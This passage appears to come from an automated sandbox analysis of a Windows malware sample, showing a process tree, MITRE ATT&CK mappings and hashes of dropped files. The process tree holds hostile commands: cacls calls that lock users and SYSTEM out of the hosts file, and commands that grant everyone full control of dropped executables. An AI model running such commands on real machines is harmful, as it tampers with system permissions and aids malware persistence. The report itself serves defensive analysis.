    PID:5592
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:5672

C:\Windows\SysWOW64\cuwouc.exe
C:\Windows\SysWOW64\cuwouc.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3316

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:4260

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\iiyquivu\tpefvts.exe /p everyone:F
1⤵
PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2716
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\iiyquivu\tpefvts.exe /p everyone:F
  2⤵
  PID:3808

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tpefvts.exe
1⤵
PID:2452
- C:\Windows\ime\tpefvts.exe
  C:\Windows\ime\tpefvts.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4220

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\avfhdtkbl\ffieug.exe /p everyone:F
1⤵
PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2196
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\avfhdtkbl\ffieug.exe /p everyone:F
  2⤵
  PID:2796

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\iiyquivu\tpefvts.exe /p everyone:F
1⤵
PID:5432
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\iiyquivu\tpefvts.exe /p everyone:F
  2⤵
  PID:5812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5832

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\avfhdtkbl\ffieug.exe /p everyone:F
1⤵
PID:5536
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\avfhdtkbl\ffieug.exe /p everyone:F
  2⤵
  PID:5984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5744

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tpefvts.exe
1⤵
PID:5452
- C:\Windows\ime\tpefvts.exe
  C:\Windows\ime\tpefvts.exe
  2⤵
  PID:5972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\IME\tpefvts.exe

Filesize
9.4MB

MD5
0d09ec185b9da2803396442f90de0ed7

SHA1
38d6ecb8bb1054f28e6202de57e309fba81e00a3

SHA256
4caf06d94a4b51c78d796c9e38f2d60d371e097f8dbd60dd1416b25921164478

SHA512
1cc1a654ef72b0b5b70d94ec77eebd6bc4f36fc3e5a36e518cf3d80277c3c9cee669ade31a41060c651a9d3402d491227069fe1e365b96560e0683fcd58bc698

Download Submit
C:\Windows\IME\tpefvts.exe

Filesize
9.4MB

MD5
0d09ec185b9da2803396442f90de0ed7

SHA1
38d6ecb8bb1054f28e6202de57e309fba81e00a3

SHA256
4caf06d94a4b51c78d796c9e38f2d60d371e097f8dbd60dd1416b25921164478

SHA512
1cc1a654ef72b0b5b70d94ec77eebd6bc4f36fc3e5a36e518cf3d80277c3c9cee669ade31a41060c651a9d3402d491227069fe1e365b96560e0683fcd58bc698

Download Submit
C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\cuwouc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\SysWOW64\cuwouc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\avfhdtkbl\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\avfhdtkbl\ffieug.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\TEMP\cubjtihin\1692.dmp

Filesize
4.1MB

MD5
9aebb5f4f6cfc19cad05ce8b39081b34

SHA1
b3c7566447d3a713c458b8e5edaf5ca03956ef36

SHA256
d8f2e33a490c5b0b8015195396f0c16f907c99aa1ec32d8fdcd23562187f7a31

SHA512
12c8c8ecbf21200c479e03f2c1505f045b3f74fe95bbe0ed2b8fd9c6e7c10ddb8f88d8211708c04023f89d9cacab6f9c83bada1f8e7a15c2e8641816f5fa5b40

Download Submit
C:\Windows\TEMP\cubjtihin\2504.dmp

Filesize
7.6MB

MD5
c2f44d910dfbf0019978ac8ee31770f2

SHA1
62a9e7da90996d817b20f6ad5f8bf0e4cf32f94a

SHA256
aca505126dcbc9db59522dda07c207d2a32dfade5ce95f70977bd6ff524a22f7

SHA512
953c1206e3e5e930fda9e30c933fcb9a018af424b3aa67121d8ba84830c77e16a789cbc40f325609a51ffe860a99813774b50f03acf146c51e40644c2272091c

Download Submit
C:\Windows\TEMP\cubjtihin\2524.dmp

Filesize
854KB

MD5
0b288a3846879cbbca2b272a06473fd1

SHA1
ba602db79db6c88b9ff0170461c966b945b9f5da

SHA256
d4d372927c09c0006e983f26a4ddbe01af7b186deb82a434db24c3e0ffa83d78

SHA512
e667f90a86e6156ec9132ba8dc37a9c7035e8bf29d54704b3db9b3412cd0c6e6c5e208f60dbbefcbd6f29edc238cb008a9b7b01d4b8e453e68f9652bbbe6ee47

Download Submit
C:\Windows\TEMP\cubjtihin\2584.dmp

Filesize
4.3MB

MD5
365a3fd7fd3027a5245d3fa3949bba38

SHA1
edc7597cc1ea9d25639f40ff7d63de05d41f1ba3

SHA256
85cc944b6ef073a80c0db02e81386d4fa7209b05f292253fc62caf92e8fde45e

SHA512
a57dafaf38bf0792752b57bec02ae6aff9b9da0972e86547a0d032f45f8b4424eae005259a1ab6675c2e3945936a4c13338a305ddd538b4aee95bc41664eb5a2

Download Submit
C:\Windows\TEMP\cubjtihin\2840.dmp

Filesize
2.9MB

MD5
a77fa6297a4422acbcc486be6efef6e1

SHA1
02eaf02fe7271fe3e88b640f4a4750a3a662fb14

SHA256
32ac8cf470fb1a44e532adfe0684626674c6677f5e265a95df02457a614c88c3

SHA512
51a70e230779bdb34f578a62e598a3f8bef880045e0636e37282c0dededa94d92f4d405fa46140427c12f43fb3cf70fd4ad1e429ecbdd8a671df0868221eb230

Download Submit
C:\Windows\TEMP\cubjtihin\3524.dmp

Filesize
2.9MB

MD5
b5c4b30ccb796a6aed6ede4c09e63cd7

SHA1
21645cdc88e3e1d6afd133c6a6dd6bbf22014934

SHA256
dc61860431cf48440110c7baaa7f73161c1b4412f6a52216bf9424951d8f8d54

SHA512
033215a7915064bd2d3bd4ff757b135db173da222ad56f260bff7ba14de566f4466e4fb9f2171f3d41bd1fa02182103464fb02fe9cf8c08e104e447be66273ab

Download Submit
C:\Windows\TEMP\cubjtihin\3532.dmp

Filesize
8.8MB

MD5
21a95597631fe607fe7a4c057fef60c0

SHA1
159037a27652698590611420eae772e89765fa78

SHA256
56949f16e8cb6bec00646bc779be12cefbc64eafa38389254f79b06eb293a039

SHA512
5354a3397957e3f9b50199668cfa05f18a648383609f0c8b5872c05a9a2b7250d041f41f953f0cb08786e0cdb2af341f33f7f78c42cf66b57f7e84a820ca6da8

Download Submit
C:\Windows\TEMP\cubjtihin\3632.dmp

Filesize
20.9MB

MD5
41c4fee23f3f80042fd3e571e1b7b157

SHA1
94d2bb6c3ee957355238ed0c04da38c47ea8e851

SHA256
a82d2609e8dd22da00a15819de5e4b1665728b4c3297121c2833dba28c5d60b8

SHA512
cc13a4616eda6fe846b75f8cfb67739f13b9161e0b6d7cf51d915a4d433704216469d6cae7355b330917df5a344682fcff2f37376e119148ec40f8bbdb985dd4

Download Submit
C:\Windows\TEMP\cubjtihin\3700.dmp

Filesize
5.5MB

MD5
af607316de3fd4ce151090898587b0b0

SHA1
91714c5079696b6ae56c7cb655628e41d8910d39

SHA256
23f9d0c7b6016182bbe6fc6000de040f494b5b4f3adb23d6b05a4dbebd23a4ad

SHA512
eb8074ebf262c4475db064c21857f05dc938ea4dd63bd98a579a4de90bcf6791e8b225c2b5b1f66ec0831e5d7248083440732e781d7436e6b0ade42d2a7ceb75

Download Submit
C:\Windows\TEMP\cubjtihin\3740.dmp

Filesize
26.5MB

MD5
f0e04a8c1a90d60d7df1d7f5174ab27d

SHA1
a19b9f2a9ec11448ed4b307ee5107b2a1652e591

SHA256
7e99f41e39a0c39812c78f572956be01be0db100f26cb19850df587c8f56791d

SHA512
092a620b1298096f36cfe310cfb15b758ef39279b0baec25c2997913f186d6fce6bca1cbdd289cc84f8f04f294b0fe81fc525d5e4f4e276f8eea63d777529a14

Download Submit
C:\Windows\TEMP\cubjtihin\3784.dmp

Filesize
44.2MB

MD5
2bb9b5432dde667cac7455d0767267fc

SHA1
af08b656bd5d2de04e182714323dbfde8af47304

SHA256
727e4362eb5722ed6ab9edf750eeb75373356adf82d118539240856e537fb1c6

SHA512
b2caa18610939b0d2a8b06461b73056d0da43a156df31c448f70067b57e4a466bb72a2d72775206d206da155c61951fb824548e5f682e6220fa112dc973884fa

Download Submit
C:\Windows\TEMP\cubjtihin\3812.dmp

Filesize
1.2MB

MD5
313f046c34873d1f855bd40d0f015bb4

SHA1
c050d9f31d6eb69c6587120dcb719b28189b8baa

SHA256
e42845134cf406b2ae5ac929c42ae6fccadafbc60b8695b7f5f4bb59291307f7

SHA512
9632e6a2c70720caf7f5b294b5dd8b8b3965c27fe7440aca629673f1654bc407cd3adda5332397e11a4104e500c66f2a8ecb2536780e8c7c8c0a4f49327ad02f

Download Submit
C:\Windows\TEMP\cubjtihin\384.dmp

Filesize
34.2MB

MD5
4a4f47a6c9a63845d38004158a3715fb

SHA1
f9cd482edf6d43eb49cb23c4ac49536568e9b8af

SHA256
f83f8bd6bef746201469aea81f456840432857b71778ae2ebfe8350ba21a2cda

SHA512
29cd9151060d63271e8ab3fab92c708deffe2976952722d7c6bce46647966d97456a879485be8e3fc34a9be366ab88f845a6838e353999bc7d0078813599130b

Download Submit
C:\Windows\TEMP\cubjtihin\788.dmp

Filesize
2.0MB

MD5
08413452cc111cea7c32c9c3ffa556f1

SHA1
ee3e2880d52798ea29a8b5c969f33f2471e0eca2

SHA256
f67765e0e84292d502e296ab2308d1346902713cbbc5932d298c5cb908e6a1f3

SHA512
b47442ad609568bebf53f1b6dce4cc91abb66790933ecf39d9c8a1cd14de414bc1931a4d502e8a62b0cc70c03f23977dba86ca2f72becafd9f3d57090346e7ea

Download Submit
C:\Windows\TEMP\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\TEMP\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\Temp\avfhdtkbl\ffieug.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\cubjtihin\bshigespg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\nsj4DDF.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\cubjtihin\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\cubjtihin\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\cubjtihin\cgeufuill\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\cubjtihin\cgeufuill\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\cubjtihin\cgeufuill\ahunzksbu.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\cubjtihin\cgeufuill\ahunzksbu.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
